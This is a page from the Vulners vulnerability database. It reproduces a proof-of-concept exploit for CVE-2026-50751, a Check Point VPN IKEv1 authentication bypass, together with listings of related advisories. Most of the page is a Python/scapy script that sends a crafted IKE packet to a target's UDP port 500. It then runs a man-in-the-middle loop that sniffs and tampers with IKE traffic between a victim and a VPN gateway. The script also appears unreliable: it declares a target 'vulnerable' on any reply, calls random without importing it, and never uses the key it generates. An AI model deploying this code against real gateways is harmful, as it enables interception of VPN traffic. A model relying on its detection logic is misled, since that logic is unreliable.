Vulners
Lucene search
📄 Check Point VPN IKE Logic Flaw
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Exploit for Improper Authentication in Checkpoint Gaia_Os | 10 Jun 202614:40 | – | githubexploit |
| Exploit for Improper Authentication in Checkpoint Gaia_Os | 12 Jun 202614:25 | – | githubexploit |
| Exploit for Improper Authentication in Checkpoint Gaia_Os | 10 Jun 202614:16 | – | githubexploit |
 | CVE-2026-50751 | 8 Jun 202611:07 | – | attackerkb |
 | CVE-2026-50751 | 8 Jun 202607:24 | – | circl |
 | Check Point Security Gateway Improper Authentication Vulnerability | 8 Jun 202600:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 8 Jun 202612:00 | – | cisa |
 | CVE-2026-50751 - User Authentication bypass on VPN Remote Access and Mobile Access in deprecated IKEv1 key exchange | 4 Jun 202600:00 | – | checkpoint_security |
 | CVE-2026-50751 | 8 Jun 202611:07 | – | cve |
 | CVE-2026-50751 User Authentication Bypass in VPN Remote Access and Mobile Access | 8 Jun 202611:07 | – | cvelist |
10
==================================================================================================================================
| # Title : Check Point VPN IKE Legacy Auth Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A Python script attempting to exploit a vulnerability in Check Point VPN (CVE-2026-50751) by sending a malformed
IKE_SA_INIT packet to UDP port 500, detecting whether the target responds
as an indicator of exploitability, then executing a MITM attack to intercept IKE packets between a victim and a VPN gateway.
[+] POC :
#!/usr/bin/env python3
import socket
import struct
import sys
import time
from scapy.all import *
from cryptography.hazmat.primitives.asymmetric import x25519
from cryptography.hazmat.primitives import serialization
class CVE202650751Exploit:
def __init__(self, target_ip, target_port=500):
self.target_ip = target_ip
self.target_port = target_port
self.sock = None
def create_ike_sa_init(self):
"""Create a fake IKE_SA_INIT package"""
ike_header = struct.pack('!BBBB I I I',
0x20,
0x20,
0x00,
0x00,
0x00000001,
0x00000000,
0x00000001
)
legacy_payload = bytes([
0x20,
0x00,
0x00, 0x04,
0x01, 0x02, 0x03, 0x04
])
return ike_header + legacy_payload
def exploit_legacy_auth(self):
"""Exploiting weak authentication from existing customers"""
print(f"[*] Targeting {self.target_ip}:{self.target_port}")
private_key = x25519.X25519PrivateKey.generate()
public_key = private_key.public_key()
packet = IP(dst=self.target_ip)/UDP(sport=random.randint(45000, 65535), dport=self.target_port)
ike_data = self.create_ike_sa_init()
print("[*] Sending malicious IKE packet...")
try:
response = sr1(packet/Raw(load=ike_data), timeout=3, verbose=0)
if response:
print("[+] Received response - Target may be vulnerable")
return True
except Exception as e:
print(f"[-] Exploit failed: {e}")
return False
def mitm_attack(self, victim_ip, vpn_gateway):
"""Man-in-the-middle attack to intercept VPN communications"""
print(f"[*] Starting MITM attack between {victim_ip} and {vpn_gateway}")
def packet_handler(pkt):
if IP in pkt and UDP in pkt:
if pkt[UDP].dport == 500 or pkt[UDP].sport == 500:
print(f"[+] Intercepted IKE packet from {pkt[IP].src}")
modified_payload = pkt[Raw].load + b'\x00\x00\x00\x01BAD'
send(IP(src=pkt[IP].dst, dst=pkt[IP].src)/
UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)/
Raw(load=modified_payload), verbose=0)
sniff(filter=f"host {victim_ip} and host {vpn_gateway} and port 500",
prn=packet_handler, store=0)
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_ip> [victim_ip]")
sys.exit(1)
exploit = CVE202650751Exploit(sys.argv[1])
if exploit.exploit_legacy_auth():
print("\n[!] VULNERABLE - Legacy client authentication bypass possible!")
print("[!] CVE-2026-50751 exploitation successful")
if len(sys.argv) == 3:
print(f"[*] Initiating MITM attack against {sys.argv[2]}")
exploit.mitm_attack(sys.argv[2], sys.argv[1])
else:
print("\n[+] Target appears patched or not vulnerable")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jun 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.19.3
EPSS0.11841
SSVC